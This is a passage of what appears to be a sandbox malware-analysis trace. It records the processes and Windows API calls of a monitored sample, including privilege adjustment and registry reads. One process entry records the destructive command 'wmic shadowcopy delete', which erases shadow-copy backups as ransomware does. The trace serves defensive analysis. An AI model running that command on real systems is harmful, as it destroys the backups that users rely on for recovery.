HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 194 os_tid = 0xaa8 Thread: id = 195 os_tid = 0x578 Thread: id = 196 os_tid = 0x574 Thread: id = 197 os_tid = 0x520 Thread: id = 198 os_tid = 0x514 Thread: id = 199 os_tid = 0x510 Process: id = "70" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x16962000" os_pid = "0x62c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "61" os_parent_pid = "0x900" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00080ecf" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 203 os_tid = 0x648 Thread: id = 204 os_tid = 0x8a8 Thread: id = 205 os_tid = 0x858 Thread: id = 206 os_tid = 0x8c4 [0072.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc5dcb0 | out: lpSystemTimeAsFileTime=0xc5dcb0*(dwLowDateTime=0x9a212a50, dwHighDateTime=0x1d57b18)) [0072.948] GetCurrentProcessId () returned 0x62c [0072.948] GetCurrentThreadId () returned 0x8c4 [0072.948] GetTickCount () returned 0x114c19b [0072.948] QueryPerformanceCounter (in: lpPerformanceCount=0xc5dcb8 | out: lpPerformanceCount=0xc5dcb8*=19317108273) returned 1 [0072.950] malloc (_Size=0x100) returned 0x3f8e80 [0100.105] free (_Block=0x3f8e80) Thread: id = 207 os_tid = 0x8c0 Thread: id = 208 os_tid = 0xb94 Thread: id = 209 os_tid = 0x534 Thread: id = 211 os_tid = 0x8d0 Thread: id = 291 os_tid = 0x318 Process: id = "71" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x15d57000" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "42" os_parent_pid = "0xbdc" cmd_line = "wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 212 os_tid = 0x8b0 [0073.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcf0 | out: lpSystemTimeAsFileTime=0x26fcf0*(dwLowDateTime=0x9a8c4830, dwHighDateTime=0x1d57b18)) [0073.805] GetCurrentProcessId () returned 0x86c [0073.805] GetCurrentThreadId () returned 0x8b0 [0073.805] GetTickCount () returned 0x114c459 [0073.805] QueryPerformanceCounter (in: lpPerformanceCount=0x26fce8 | out: lpPerformanceCount=0x26fce8*=19402653888) returned 1 [0073.806] GetModuleHandleA (lpModuleName=0x0) returned 0xe00000 [0073.806] __set_app_type (_Type=0x1) [0073.806] __p__fmode () returned 0x74eb31f4 [0073.806] __p__commode () returned 0x74eb31fc [0073.806] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe3dc15) returned 0x0 [0073.806] __wgetmainargs (in: _Argc=0xe4c5e8, _Argv=0xe4c5f0, _Env=0xe4c5ec, _DoWildCard=0, _StartInfo=0xe4c5fc | out: _Argc=0xe4c5e8, _Argv=0xe4c5f0, _Env=0xe4c5ec) returned 0 [0073.815] ??0CHString@@QAE@XZ () returned 0xe4c28c [0073.815] malloc (_Size=0x18) returned 0x143d88 [0073.816] malloc (_Size=0x38) returned 0x143da8 [0073.816] malloc (_Size=0x28) returned 0x143de8 [0073.816] malloc (_Size=0x18) returned 0x143e18 [0073.816] malloc (_Size=0x24) returned 0x143e38 [0073.816] malloc (_Size=0x18) returned 0x143e68 [0073.816] malloc (_Size=0x18) returned 0x143e88 [0073.816] ??0CHString@@QAE@XZ () returned 0xe4c594 [0073.816] malloc (_Size=0x18) returned 0x143ea8 [0073.816] ?Empty@CHString@@QAEXXZ () returned 0x74290504 [0073.817] SetConsoleCtrlHandler (HandlerRoutine=0xe36b6f, Add=1) returned 1 [0073.817] _onexit (_Func=0xe42f1f) returned 0xe42f1f [0073.817] _onexit (_Func=0xe42f2e) returned 0xe42f2e [0073.817] _onexit (_Func=0xe42f42) returned 0xe42f42 [0073.817] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.817] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0073.818] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0073.825] CoCreateInstance (in: rclsid=0xe06c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe06b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xe4c1b0 | out: ppv=0xe4c1b0*=0xa60828) returned 0x0 [0073.834] GetCurrentProcess () returned 0xffffffff [0073.834] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x26fb98 | out: TokenHandle=0x26fb98*=0x108) returned 1 [0073.834] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26fb94 | out: TokenInformation=0x0, ReturnLength=0x26fb94) returned 0 [0073.834] malloc (_Size=0x118) returned 0x142720 [0073.834] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x142720, TokenInformationLength=0x118, ReturnLength=0x26fb94 | out: TokenInformation=0x142720, ReturnLength=0x26fb94) returned 1 [0073.835] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x142720*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0073.835] free (_Block=0x142720) [0073.835] CloseHandle (hObject=0x108) returned 1 [0073.835] malloc (_Size=0x40) returned 0x142720 [0073.835] malloc (_Size=0x40) returned 0x142768 [0073.835] malloc (_Size=0x40) returned 0x1427b0 [0073.835] malloc (_Size=0x20a) returned 0x1427f8 [0073.835] GetSystemDirectoryW (in: lpBuffer=0x1427f8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0073.835] free (_Block=0x1427f8) [0073.836] malloc (_Size=0xc) returned 0x1427f8 [0073.836] malloc (_Size=0xc) returned 0x142810 [0073.836] malloc (_Size=0xc) returned 0x142828 [0073.836] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0073.836] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0073.836] free (_Block=0x1427f8) [0073.836] free (_Block=0x142810) [0073.836] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76c20000 [0073.837] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0073.837] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.837] FreeLibrary (hLibModule=0x76c20000) returned 1 [0073.837] free (_Block=0x142828) [0073.837] _vsnwprintf (in: _Buffer=0x1427b0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26faf4 | out: _Buffer="ms_409") returned 6 [0073.837] malloc (_Size=0x20) returned 0x1427f8 [0073.837] GetComputerNameW (in: lpBuffer=0x1427f8, nSize=0x26fb4c | out: lpBuffer="XDUWTFONO", nSize=0x26fb4c) returned 1 [0073.838] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.838] malloc (_Size=0x14) returned 0x142820 [0073.838] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26fb88 | out: lpNameBuffer=0x0, nSize=0x26fb88) returned 0x0 [0073.838] GetLastError () returned 0xea [0073.838] malloc (_Size=0x40) returned 0x142840 [0073.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x142840, nSize=0x26fb88 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26fb88) returned 0x1 [0073.839] lstrlenW (lpString="") returned 0 [0073.839] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.839] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0073.840] lstrlenW (lpString=".") returned 1 [0073.840] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0073.841] lstrlenW (lpString="LOCALHOST") returned 9 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0073.841] free (_Block=0x142820) [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] malloc (_Size=0x14) returned 0x142820 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] malloc (_Size=0x14) returned 0x142888 [0073.841] lstrlenW (lpString="XDUWTFONO") returned 9 [0073.841] malloc (_Size=0x4) returned 0x143fd8 [0073.841] malloc (_Size=0xc) returned 0x1428a8 [0073.841] malloc (_Size=0x18) returned 0x1428c0 [0073.841] malloc (_Size=0xc) returned 0x1428e0 [0073.841] SysStringLen (param_1="IDENTIFY") returned 0x8 [0073.841] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0073.841] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0073.841] SysStringLen (param_1="IDENTIFY") returned 0x8 [0073.841] malloc (_Size=0x18) returned 0x1428f8 [0073.841] malloc (_Size=0xc) returned 0x142918 [0073.841] SysStringLen (param_1="IMPERSONATE") returned 0xb [0073.841] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0073.841] SysStringLen (param_1="IMPERSONATE") returned 0xb [0073.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0073.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0073.842] SysStringLen (param_1="IMPERSONATE") returned 0xb [0073.842] malloc (_Size=0x18) returned 0x142930 [0073.842] malloc (_Size=0xc) returned 0x142950 [0073.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0073.842] SysStringLen (param_1="IDENTIFY") returned 0x8 [0073.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0073.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0073.842] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0073.842] SysStringLen (param_1="DELEGATE") returned 0x8 [0073.842] malloc (_Size=0x18) returned 0x142968 [0073.842] malloc (_Size=0xc) returned 0x142988 [0073.842] malloc (_Size=0x18) returned 0x1429a0 [0073.842] malloc (_Size=0xc) returned 0x1429c0 [0073.842] SysStringLen (param_1="NONE") returned 0x4 [0073.842] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.842] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.842] SysStringLen (param_1="NONE") returned 0x4 [0073.842] malloc (_Size=0x18) returned 0x1429d8 [0073.842] malloc (_Size=0xc) returned 0x1429f8 [0073.843] SysStringLen (param_1="CONNECT") returned 0x7 [0073.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.843] malloc (_Size=0x18) returned 0x142a10 [0073.843] malloc (_Size=0xc) returned 0x142a30 [0073.843] SysStringLen (param_1="CALL") returned 0x4 [0073.843] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.843] SysStringLen (param_1="CALL") returned 0x4 [0073.843] SysStringLen (param_1="CONNECT") returned 0x7 [0073.843] malloc (_Size=0x18) returned 0x14e868 [0073.844] malloc (_Size=0xc) returned 0x142e48 [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] SysStringLen (param_1="NONE") returned 0x4 [0073.844] SysStringLen (param_1="NONE") returned 0x4 [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] malloc (_Size=0x18) returned 0x14e888 [0073.844] malloc (_Size=0xc) returned 0x142e60 [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] SysStringLen (param_1="NONE") returned 0x4 [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] malloc (_Size=0x18) returned 0x14e8a8 [0073.844] malloc (_Size=0xc) returned 0x142e78 [0073.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0073.844] SysStringLen (param_1="DEFAULT") returned 0x7 [0073.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0073.844] SysStringLen (param_1="PKT") returned 0x3 [0073.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0073.844] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0073.844] malloc (_Size=0x18) returned 0x14e8c8 [0073.845] malloc (_Size=0x40) returned 0x142e90 [0073.845] malloc (_Size=0x20a) returned 0x142ed8 [0073.845] GetSystemDirectoryW (in: lpBuffer=0x142ed8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0073.845] free (_Block=0x142ed8) [0073.845] malloc (_Size=0xc) returned 0x142ed8 [0073.845] malloc (_Size=0xc) returned 0x142ef0 [0073.845] malloc (_Size=0xc) returned 0x142f08 [0073.845] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0073.845] SysStringLen (param_1="\\wbem\\") returned 0x6 [0073.845] free (_Block=0x142ed8) [0073.845] free (_Block=0x142ef0) [0073.845] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0073.845] free (_Block=0x142f08) [0073.845] malloc (_Size=0xc) returned 0x142ed8 [0073.845] malloc (_Size=0xc) returned 0x142ef0 [0073.845] malloc (_Size=0xc) returned 0x142f08 [0073.845] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0073.845] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0073.845] free (_Block=0x142ed8) [0073.845] free (_Block=0x142ef0) [0073.845] GetCurrentThreadId () returned 0x8b0 [0073.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f6a4 | out: phkResult=0x26f6a4*=0x10c) returned 0x0 [0073.846] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f6b0, lpcbData=0x26f6ac*=0x400 | out: lpType=0x0, lpData=0x26f6b0*=0x30, lpcbData=0x26f6ac*=0x4) returned 0x0 [0073.846] _wcsicmp (_String1="0", _String2="1") returned -1 [0073.846] _wcsicmp (_String1="0", _String2="2") returned -2 [0073.846] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f6ac*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f6ac*=0x42) returned 0x0 [0073.846] malloc (_Size=0x86) returned 0x142f20 [0073.846] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x142f20, lpcbData=0x26f6ac*=0x42 | out: lpType=0x0, lpData=0x142f20*=0x25, lpcbData=0x26f6ac*=0x42) returned 0x0 [0073.846] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0073.846] malloc (_Size=0x42) returned 0x142fb0 [0073.846] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0073.846] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f6b0, lpcbData=0x26f6ac*=0x400 | out: lpType=0x0, lpData=0x26f6b0*=0x36, lpcbData=0x26f6ac*=0xc) returned 0x0 [0073.846] _wtol (_String="65536") returned 65536 [0073.846] free (_Block=0x142f20) [0073.846] RegCloseKey (hKey=0x0) returned 0x6 [0073.846] CoCreateInstance (in: rclsid=0xe06d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe06d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26fb40 | out: ppv=0x26fb40*=0x23e4630) returned 0x0 [0074.046] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x23e4630, xmlSource=0x26fac4*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x7716, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x26fb28 | out: isSuccessful=0x26fb28*=0xffff) returned 0x0 [0074.218] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23e4630, DOMElement=0x26fb3c | out: DOMElement=0x26fb3c*=0x23e8c58) returned 0x0 [0074.218] malloc (_Size=0xc) returned 0x142ed8 [0074.219] IXMLDOMElement:getElementsByTagName (in: This=0x23e8c58, tagName="XSLFORMAT", resultList=0x26fb38 | out: resultList=0x26fb38*=0x23e8e80) returned 0x0 [0074.219] free (_Block=0x142ed8) [0074.219] IXMLDOMNodeList:get_length (in: This=0x23e8e80, listLength=0x26fb20 | out: listLength=0x26fb20*=21) returned 0x0 [0074.219] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=0, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.219] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.219] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.220] malloc (_Size=0xc) returned 0x142ed8 [0074.220] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.220] free (_Block=0x142ed8) [0074.220] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0074.220] malloc (_Size=0xc) returned 0x142ed8 [0074.220] malloc (_Size=0xc) returned 0x142ef0 [0074.220] malloc (_Size=0x18) returned 0x14e8e8 [0074.221] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.221] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.221] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.221] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=1, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.221] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="textvaluelist.xsl") returned 0x0 [0074.221] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.221] malloc (_Size=0xc) returned 0x143110 [0074.221] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.221] free (_Block=0x143110) [0074.221] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0074.221] malloc (_Size=0xc) returned 0x143110 [0074.221] malloc (_Size=0xc) returned 0x143128 [0074.221] SysStringLen (param_1="VALUE") returned 0x5 [0074.221] SysStringLen (param_1="TABLE") returned 0x5 [0074.221] SysStringLen (param_1="TABLE") returned 0x5 [0074.221] SysStringLen (param_1="VALUE") returned 0x5 [0074.221] malloc (_Size=0x18) returned 0x14e908 [0074.221] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.222] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.222] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.222] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=2, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.222] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="textvaluelist.xsl") returned 0x0 [0074.222] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.222] malloc (_Size=0xc) returned 0x143140 [0074.222] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.222] free (_Block=0x143140) [0074.222] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="LIST", varVal2=0x0)) returned 0x0 [0074.222] malloc (_Size=0xc) returned 0x14fac8 [0074.222] malloc (_Size=0xc) returned 0x14fae0 [0074.222] SysStringLen (param_1="LIST") returned 0x4 [0074.222] SysStringLen (param_1="TABLE") returned 0x5 [0074.222] malloc (_Size=0x18) returned 0x14e928 [0074.222] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.222] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.222] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.222] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=3, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.223] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="rawxml.xsl") returned 0x0 [0074.223] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.223] malloc (_Size=0xc) returned 0x14faf8 [0074.223] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.223] free (_Block=0x14faf8) [0074.223] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0074.223] malloc (_Size=0xc) returned 0x14faf8 [0074.223] malloc (_Size=0xc) returned 0x14fb10 [0074.223] SysStringLen (param_1="RAWXML") returned 0x6 [0074.223] SysStringLen (param_1="TABLE") returned 0x5 [0074.223] SysStringLen (param_1="RAWXML") returned 0x6 [0074.223] SysStringLen (param_1="LIST") returned 0x4 [0074.223] SysStringLen (param_1="LIST") returned 0x4 [0074.223] SysStringLen (param_1="RAWXML") returned 0x6 [0074.223] malloc (_Size=0x18) returned 0x14e948 [0074.223] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.223] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.223] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.223] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=4, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.224] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="htable.xsl") returned 0x0 [0074.224] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.224] malloc (_Size=0xc) returned 0x14fb28 [0074.224] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.224] free (_Block=0x14fb28) [0074.224] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0074.224] malloc (_Size=0xc) returned 0x14fb28 [0074.224] malloc (_Size=0xc) returned 0x14fb40 [0074.224] SysStringLen (param_1="HTABLE") returned 0x6 [0074.224] SysStringLen (param_1="TABLE") returned 0x5 [0074.224] SysStringLen (param_1="HTABLE") returned 0x6 [0074.224] SysStringLen (param_1="LIST") returned 0x4 [0074.224] malloc (_Size=0x18) returned 0x14e968 [0074.224] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.224] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.224] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.224] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=5, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.224] IXMLDOMNode:get_text (in: This=0x23e4b20, 